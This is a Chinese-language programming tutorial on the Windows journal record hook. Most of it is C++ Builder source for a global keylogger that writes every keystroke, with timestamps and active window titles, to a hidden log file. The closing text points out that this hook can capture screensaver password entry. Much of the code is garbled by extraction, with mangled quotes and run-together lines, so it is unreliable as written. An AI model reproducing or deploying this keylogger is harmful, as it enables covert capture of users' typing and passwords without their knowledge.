WIN95日志鉤子(JournalRecord Hook)的使用

鉤子是WINDOWS中消息處理機制的一個要點，通過安裝各種鉤子，應用程序能夠設置相應的子例程來監視系統裡的消息傳遞以及在這些消息到達目標窗口程序之前處理它們。鉤子的種類很多，每種鉤子可以截獲並處理相應的消息，如鍵盤鉤子可以截獲鍵盤消息，鼠標鉤子可以截獲鼠標消息，外殼鉤子可以截獲啟動和關閉應用程序的消息，日志鉤子可以監視和記錄輸入事件。鉤子分為線程專用鉤子和全局鉤子，線程專用鉤子只監視指定的線程，要監視系統中的所有線程，必須用到全局鉤子。對於全局鉤子，鉤子函數必須包含在獨立的動態鏈接庫(DLL)中，這樣才能被各種相關聯的應用程序調用。在WINDOWS中，日志鉤子是個很特別的鉤子，它只有全局鉤子一種，是鍵盤鼠標等輸入設備的消息在系統消息隊列被取出時發生的，而且系統中只能存在一個這樣的日志鉤子，更重要是，它不必用在動態鏈接庫中，這樣可以省卻了為安裝一個全局鉤子而建立一個動態鏈接庫的麻煩。利用日志鉤子，我們可以監視各種輸入事件，下面的示例可以用來記錄鍵盤的輸入，當有按鍵發生時，自動記錄按鍵動作的日期和時間以及當前激活的窗口名稱。本示例在中文WIN98，Borland C++ Builder4中編譯通過。

---- 1．新建一個工程，在窗體Form1中放置兩個按鈕Button1和Button2, CAPTION分別 為“安裝日志鉤子”和“卸載日志鉤子”。

---- 2． 定義如下全局變量：

HHOOK g_hLogHook=NULL;　　 //鉤子變量
HWND g_hLastFocus=NULL;　　 
//記錄上一次得到焦點的窗口句柄
const int KeyPressMask=0x80000000;　//鍵盤掩碼常量
char g_PrvChar;　　　//保存上一次按鍵值
3．在Button1的OnClick事件中輸入：
void __fastcall TForm1::Button1Click(TObject *Sender)
{
　 if　(g_hLogHook==NULL)
　  g_hLogHook = SetWindowsHookEx
(WH_JOURNALRECORD,
　　　　 (HOOKPROC)JournalLogProc,
HInstance,0);　//安裝日志鉤子
}
4．在Button2的OnClick事件中輸入：
void __fastcall TForm1::Button2Click(TObject *Sender)
{
if (g_hLogHook!=NULL)
　 {UnhookWindowsHookEx(g_hLogHook);
　  g_hLogHook=NULL;
　 }　//卸載日志鉤子
}
5．輸入鉤子回調函數：
HOOKPROC JournalLogProc(int iCode,
WPARAM wParam, LPARAM lParam)
{
if (iCode<0) return (HOOKPROC)CallNextHookEx (g_hLogHook,iCode,wParam,lParam); if (iCode="=HC_ACTION)" {EVENTMSG *pEvt="(EVENTMSG" *)lParam; int i; HWND hFocus; //保存當前活動窗口句柄 char szTitle[256]; //當前窗口名稱 char szTime[128]; //保存當前的日期和時間 FILE *stream="fopen(“c:\\logfile.txt”,"a+t");" if (pEvt->message==WM_KEYDOWN)　　 
　　 {int vKey=LOBYTE(pEvt- >paramL);　　// 取得虛擬鍵值
　　  char ch;
　　  char str[10];
　　  hFocus=GetActiveWindow();　　 
　 //取得當前活動窗口句柄
　　  if(g_hLastFocus!=hFocus)　　 
　 //當前活動窗口是否改變
　　　 {GetWindowText(hFocus,szTitle,256);
　　　  g_hLastFocus=hFocus;
　　　  strcpy(szTime,DateTimeToStr(Now())
.c_str());　//得到當前的日期時間
　　　  fprintf(stream,"%c%s%c%c%s",
10,szTime,32,32,szTitle);　//寫入文件
　　　  fprintf(stream,"%c%c",32,32); 
　　　 }
　　  int iShift=GetKeyState(0x10); 
//測試SHIFT,CAPTION,NUMLOCK等鍵是否按下
　　  int iCapital=GetKeyState(0x14);
　　  int iNumLock=GetKeyState(0x90);
　　  bool bShift=(iShift & KeyPressMask)==KeyPressMask;　 
　　  bool bCapital=(iCapital & 1)==1;
　　  bool bNumLock=(iNumLock & 1)==1;
　　  if (vKey >=48 && vKey<=57) // 數字0-9 if (!bShift) fprintf(stream,"%c",vKey); if (vKey>=65 && vKey<=90) // A-Z a-z {if (!bCapital) if (bShift) ch="vKey;" else ch="vKey+32;" else if (bShift) ch="vKey+32;" else ch="vKey;" fprintf(stream,"%c",ch); } if (vKey>=96 && vKey<=105) // 小鍵盤0-9 if (bNumLock) fprintf(stream,"%c",vKey-96+48); if (vKey>=186 && vKey<=222) // 其他鍵 {switch (vKey) {case 186:if (!bShift) ch=";" ; else ch=":" ;break; case 187:if (!bShift) ch="=" ; else ch="+" ;break; case 188:if (!bShift) ch="," ; else ch="<" ;break; case 189:if (!bShift) ch="-" ; else ch="_" ;break; case 190:if (!bShift) ch="." ; else ch=" >" ;break; case 191:if (!bShift) ch="/" ; else ch="?" ;break; case 192:if (!bShift) ch="`" ; else ch="~" ;break; case 219:if (!bShift) ch="[" ; else ch="{" ;break; case 220:if (!bShift) ch="\\" ; else ch="|" ;break; case 221:if (!bShift) ch="]" ; else ch="}" ;break; case 222:if (!bShift) ch="\" '; else ch="\"" ;break; default:ch="n" ;break; } if (ch!="n" ) fprintf(stream,"%c",ch); } // if (wParam>=112 && wParam<=123) // 功能鍵 [F1]-[F12] if (vKey>=8 && vKey<=46) //方向鍵 {switch (vKey) {case 8:strcpy(str,"[BK]");break; case 9:strcpy(str,"[TAB]");break; case 13:strcpy(str,"[EN]");break; case 32:strcpy(str,"[SP]");break; case 33:strcpy(str,"[PU]");break; case 34:strcpy(str,"[PD]");break; case 35:strcpy(str,"[END]");break; case 36:strcpy(str,"[HOME]");break; case 37:strcpy(str,"[LF]");break; case 38:strcpy(str,"[UF]");break; case 39:strcpy(str,"[RF]");break; case 40:strcpy(str,"[DF]");break; case 45:strcpy(str,"[INS]");break; case 46:strcpy(str,"[DEL]");break; default:ch="n" ;break; } if (ch!="n" ) {if (g_PrvChar!="vKey)" {fprintf(stream,"%s",str); g_PrvChar="vKey;" } } } } if (pEvt->message==WM_LBUTTONDOWN || pEvt- >message
==WM_RBUTTONDOWN)
　　　 {hFocus=GetActiveWindow();
　　　  if (g_hLastFocus!=hFocus)
　　　　 {g_hLastFocus=hFocus;
　　　　  GetWindowText(hFocus,szTitle,256);　　　 
　　  strcpy(szTime,DateTimeToStr(Now()).c_str()); 
//得到當前的日期時間
　　  fprintf(stream,"%c%s%c%c%s",
10,szTime,32,32,szTitle);　//寫入文件
　　  fprintf(stream,"%c%c",32,32); 
　　　　 }
　　　 }
fclose(stream);
return (HOOKPROC)CallNextHookEx
(g_hLogHook,iCode,wParam,lParam);
}

---- 將工程編譯執行後，每當激活一個窗口時，就會把當前窗口名稱寫入文件c:\logfile.txt中，當有按鍵時，按鍵的名稱也會寫入此文件中，這裡的並沒有處理全部的按鍵，讀者可根據需要添加相應的語句。要捕捉鍵盤的按鍵動作，用鍵盤鉤子(Keyboard Hook)也同樣可以實現，但是用日志鉤子卻比鍵盤鉤子要方便許多。首先，如果要捕捉其他應用程序的按鍵，即做成全局鉤子，鍵盤鉤子一定要單獨放在動態鏈接庫中，而日志鉤子卻不必；其次，在鍵盤鉤子函數得到的鍵盤按鍵之前，系統已經處理過這些輸入了，如果系統把這些按鍵屏蔽掉，鍵盤鉤子就無法檢測到它們，例如，當輸入屏幕保護程序密碼時，鍵盤鉤子無法檢測到用戶輸入了那些字符，而日志鉤子卻可以檢測到。

---- 無論是哪種鉤子， 都會增加系統處理消息的時間，從而降低系統的性能，我們只有在必要的時候才安裝這些鉤子，而且盡可能在不需要時移走它們。